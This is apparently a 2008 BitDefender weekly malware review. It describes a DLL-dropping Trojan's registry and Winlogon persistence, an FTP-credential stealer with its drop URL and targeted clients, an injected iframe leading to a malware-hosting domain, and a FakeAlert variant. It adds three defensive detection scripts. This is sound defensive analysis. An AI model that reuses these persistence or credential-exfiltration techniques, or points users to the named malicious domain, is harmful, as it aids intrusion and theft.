Filed Under: WEEKLY REVIEW

Interesting Trojans

08 September 2008
We have a couple of interesting Trojans this week: one that drops a DLL file and runs it, another that steals FTP passwords from well-known applications.
We also got a new iframe exploit that hints at organized cybercriminals. All in all, just a "regular" 7 days at the BitDefender Research Lab.
 
 
Upon execution, this e-threat copies itself to C:\Documents and Settings\Local Settings\Temp\__a00[some-hexa-digits].exe and adds the following registry value: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\A00[some-hexa-digits].exe = C:\Documents and Settings\Local Settings\Temp\__a00[some-hexa-digits].exe. Afterwards, the Trojan drops a .DLL file in the directory it was run from, with a *.DAT extension. It loads this .DLL and executes its exported function called A.

When the DLL code runs, it copies the .DLL into the system directory (C:\windows\system32) under a name that looks like __c00[five-hexa-digits].dat and sets the following registry key:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\__c00[five-hexa-digits]
* Logon -> B
* Impersonate -> 0x00000000
* DllName -> C:\WINDOWS\system32\__c00[five-hexa-digits].dat
* Startup -> B
* Asynchronous -> 0x00000001

It also creates a mutex named vmc_mm and downloads a file from an external link.
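The two persistence points above (a Run value launching from the Temp folder and a Winlogon Notify package whose DllName is a .dat file in system32) are easy to check for in a registry export. The script below is an added example written for this post, not BitDefender's tooling: it parses the subset of .reg syntax that regedit produces and flags both entries. The sample export, the hex digits in the __a00/__c00 names and the benign crypt32chain entry are constructed for the example.

```python
import re

# Constructed sample: a fragment of a regedit export (.reg) from a hypothetical
# XP-era host showing the two persistence points named in the write-up. The hex
# digits in __a00.../__c00... and the benign crypt32chain entry are made up for
# the example; the key paths and value names follow the post.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"A001B2C3D.exe"="C:\\Documents and Settings\\Local Settings\\Temp\\__a001b2c3d.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain]
"DLLName"="crypt32.dll"
"Logon"="ChainWlxLogonEvent"
"Asynchronous"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\__c00abcde]
"Logon"="B"
"Impersonate"=dword:00000000
"DllName"="C:\\WINDOWS\\system32\\__c00abcde.dat"
"Startup"="B"
"Asynchronous"=dword:00000001
'''

RUN_KEY_SUFFIX = "\\software\\microsoft\\windows\\currentversion\\run"
NOTIFY_PREFIX = ("hkey_local_machine\\software\\microsoft\\windows nt"
                 "\\currentversion\\winlogon\\notify\\")
# Name patterns from the write-up: __a00<hex>.exe in Temp, __c00<5 hex>.dat in system32
TEMP_DROPPER = re.compile(r"\\temp\\__a00[0-9a-f]+\.exe$", re.I)
NOTIFY_PAYLOAD = re.compile(r"__c00[0-9a-f]{5}\.dat$", re.I)


def parse_reg(text):
    """Parse the subset of .reg syntax regedit exports use: [key] headers,
    "name"="string" values and "name"=dword:hex values.
    Returns {key_path: {value_name: data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m and current is not None:
            name, raw = m.groups()
            if raw.startswith('"') and raw.endswith('"'):
                # .reg escapes backslashes and quotes inside string data
                value = raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            elif raw.startswith("dword:"):
                value = int(raw[len("dword:"):], 16)
            else:
                value = raw
            keys[current][name] = value
    return keys


def find_persistence(keys):
    """Return (kind, key, value_name, data) tuples for entries matching the
    dropper's Run value and its Winlogon Notify package. A Notify package is
    also flagged when its DllName is not a .dll, since that is unusual by itself."""
    findings = []
    for key, values in keys.items():
        lkey = key.lower()
        if lkey.endswith(RUN_KEY_SUFFIX):
            for name, data in values.items():
                if isinstance(data, str) and TEMP_DROPPER.search(data):
                    findings.append(("run-from-temp", key, name, data))
        elif lkey.startswith(NOTIFY_PREFIX):
            # Value names are case-insensitive; DllName and DLLName both occur.
            lowered = {n.lower(): d for n, d in values.items()}
            dll = str(lowered.get("dllname", ""))
            if NOTIFY_PAYLOAD.search(dll) or not dll.lower().endswith(".dll"):
                findings.append(("winlogon-notify", key, "DllName", dll))
    return findings


if __name__ == "__main__":
    for kind, key, name, data in find_persistence(parse_reg(SAMPLE_REG)):
        print(f"{kind}: [{key}] {name} = {data}")
```

Running the script prints one line for each of the two persistence entries; the legitimate crypt32chain package, whose DllName is a .dll and does not match the __c00 pattern, is left alone. On a live system the same rules can be applied to the output of `reg export` for the two key paths.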
 

This little nagger is usually dropped in the Internet Explorer directory under the name setupapi.dll by Trojan.Dropper.SHL. The Trojan steals passwords used to access FTP servers. It has different decryption routines for a set number of common FTP applications. After decryption succeeds, Tupai encrypts the data using its own routines and sends it to a database using a URL like: http://85.225.[hidden].198/ftpg/ftp.php
The following programs are targeted by Trojan.PWS.Tupai.A:
- SecureFX
- Ipswitch
- FTPWare
- Rhino Software
- FileZilla
- Total Commander
- BulletProof FTP
- GlobalSCAPE FTP
- CoffeeCup FTP
- FTP Commander Pro
- SmartFTP
- LeapFTP
- Far
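Because the stolen credentials are encrypted with the Trojan's own routine before they are sent, the usable network indicator is the drop URL path rather than the request body. The script below is an added example written for this post, not BitDefender's code: it scans Squid-style proxy log lines for requests whose path is exactly /ftpg/ftp.php and groups them by client. The log lines are constructed, and 203.0.113.10 (a TEST-NET-3 address) stands in for the host whose third octet the post redacts.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Indicator from the write-up: stolen credentials go to <host>/ftpg/ftp.php.
# The host's third octet was redacted in the post, so only the path is matched.
EXFIL_PATHS = [re.compile(r"^/ftpg/ftp\.php$", re.I)]

# Constructed Squid-style access.log lines (time elapsed client status/code
# bytes method URL ident hierarchy/peer type). 203.0.113.10 is a TEST-NET-3
# placeholder standing in for the redacted drop host.
SAMPLE_LOG = """\
1220860001.102    120 10.0.0.5 TCP_MISS/200 3210 GET http://www.example.com/index.html - DIRECT/198.51.100.20 text/html
1220860003.517     88 10.0.0.5 TCP_MISS/200 42 POST http://203.0.113.10/ftpg/ftp.php - DIRECT/203.0.113.10 text/html
1220860004.001     65 10.0.0.7 TCP_MISS/200 42 POST http://203.0.113.10/ftpg/ftp.php - DIRECT/203.0.113.10 text/html
1220860009.300    140 10.0.0.9 TCP_MISS/200 980 GET http://www.example.com/docs/ftpg/ftp.php.html - DIRECT/198.51.100.20 text/html
"""


def parse_squid_line(line):
    """Pull the fields we need out of one native-format Squid log line."""
    fields = line.split()
    if len(fields) < 7:
        return None
    return {"time": float(fields[0]), "client": fields[2],
            "method": fields[5], "url": fields[6]}


def scan_proxy_log(lines):
    """Return {client_ip: [(time, method, host, path), ...]} for requests whose
    URL path matches an exfiltration indicator. The path is matched as a whole,
    so a look-alike such as /docs/ftpg/ftp.php.html is not reported."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_squid_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["url"])
        if any(p.search(parts.path) for p in EXFIL_PATHS):
            hits[rec["client"]].append(
                (rec["time"], rec["method"], parts.hostname, parts.path))
    return dict(hits)


if __name__ == "__main__":
    for client, reqs in sorted(scan_proxy_log(SAMPLE_LOG.splitlines()).items()):
        for t, method, host, path in reqs:
            print(f"{client} -> {method} {host}{path} at {t:.3f}")
```

Each client reported this way is a host on which the FTP clients listed above should be treated as compromised and their stored credentials rotated.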
 

This is yet another iframe hack for infecting users without any notice. Legitimate Web sites contain this iframe at the end of their code. The most probable way the code gets injected into them is by SQL injection exploits. This iframe redirects users to another infected Web site which has been available for quite some time now, and is still infecting users. Here are some details about the domain:

Domain Name: orentraff.cn
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: NizovGrisha
Registrant Name: NizovGrisha
Administrative Email: [blocked]
Name Server: ns1.everydns.net
Name Server: ns2.everydns.net
Registration Date: 2007-10-02 05:14
Expiration Date: 2008-10-02 05:14

The site features adult-rated material, which of course is only a facade for its true nature. It hosts a whole bunch of e-threats, like the rogue antivirus software "XP Antivirus", Trojan.Spammer.Tedroo, Trojan.Exchanger, Trojan.Spy.Zeus and many others. It supplies this malware to the victim machine through a CGI script that fetches it from an address like: [infected_site]/in.cgi?[number_for_e-threat].
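A site owner can catch this kind of injection by auditing the HTML the server actually serves, which covers content pulled from the database as well as the templates. The auditor below is an added example written for this post, not BitDefender's code: it uses Python's HTMLParser to record every iframe and marks one for review when it sits after the closing html tag (where the post says the injected frame lands) or is hidden or zero-sized, noting in addition whether it loads from a host other than the site's own. The sample page and the site host name shop.example are constructed; the external domain in the trailing iframe is the one named in the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page: a legitimate same-site iframe inside <body>, then an
# injected frame appended after </html>, pointing at the domain from the post.
SAMPLE_HTML = """\
<html>
<head><title>Shop</title></head>
<body>
<p>Welcome.</p>
<iframe src="/help/embed.html" width="400" height="300"></iframe>
</body>
</html>
<iframe src="http://orentraff.cn/" width="1" height="1" style="visibility:hidden"></iframe>
"""


def _is_hidden(attrs):
    """True for the usual ways an injected iframe is kept out of sight."""
    def tiny(v):
        return v.strip().lower().rstrip("px").strip() in ("0", "1")
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width", "")) or tiny(attrs.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style)


class IframeAuditor(HTMLParser):
    """Records every <iframe> and notes why it looks injected."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.html_closed = False   # set once </html> has been seen
        self.findings = []

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        # A relative src loads from the site itself
        host = (urlsplit(src).hostname or self.site_host).lower()
        reasons = []
        if self.html_closed:
            reasons.append("appended after </html>")
        if _is_hidden(a):
            reasons.append("hidden or zero-sized")
        if host != self.site_host:
            reasons.append(f"loads from external host {host}")
        # A visible iframe to an external host can be a legitimate embed; only
        # placement after </html> or hiding marks the frame for review.
        if self.html_closed or _is_hidden(a):
            line, _ = self.getpos()
            self.findings.append({"line": line, "src": src, "reasons": reasons})


def audit_html(html, site_host):
    """Return a list of {line, src, reasons} dicts for suspicious iframes."""
    parser = IframeAuditor(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for f in audit_html(SAMPLE_HTML, "shop.example"):
        print(f"line {f['line']}: iframe src={f['src']!r}: " + "; ".join(f["reasons"]))
```

Run against a crawl of the site's own pages, this reports only the trailing hidden frame. Self-closing `<iframe ... />` tags are handled too, since HTMLParser routes them through handle_starttag as well.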
 
Another variant of FakeAlert has appeared as well, called Trojan.FakeAlert.ACR. It has the same functionality as its previous siblings, namely:
- changes desktop wallpaper
- replaces the screensaver with the BlueScreen joke screensaver from Sysinternals
- warns the user about fake malware infections
- downloads rogue antivirus software


